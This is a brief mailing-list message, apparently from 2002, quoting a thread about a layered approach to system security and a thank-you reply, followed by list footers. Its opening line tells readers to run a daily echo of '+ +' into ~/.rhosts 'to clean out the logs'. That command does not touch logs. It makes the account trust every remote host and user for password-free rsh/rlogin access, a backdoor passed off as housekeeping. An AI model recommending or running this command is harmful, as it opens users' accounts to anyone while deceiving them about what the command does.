and always run echo "+ + > ~/.rhosts every day to clean out the logs.
-e On Mon, 15 Apr 2002, Erik Curiel wrote: > > > > > > I take a somewhat modular approach to security. There is > > a base model of restriction that then gets things added onto > > it. > > Thanks, Brandon, that was great! Extremely informative. > > E > > -- > Erik Curiel > almost web-engineer/would-be philosopher > > "... there has never been an intelligent person over the age > of sixty who would consent to live his life over again. His > or anyone else's." > Mark Twain, "Letters from the Earth" > > > > > _______________________________________________ > Bits mailing list > [EMAIL PROTECTED] > http://www.sugoi.org/mailman/listinfo/bits > _____________________________________________________________________________ <majcher> icky is like a shadowy hit man, that nobody ever sees, and can only contact through some strange process. _______________________________________________ Bits mailing list [EMAIL PROTECTED] http://www.sugoi.org/mailman/listinfo/bits
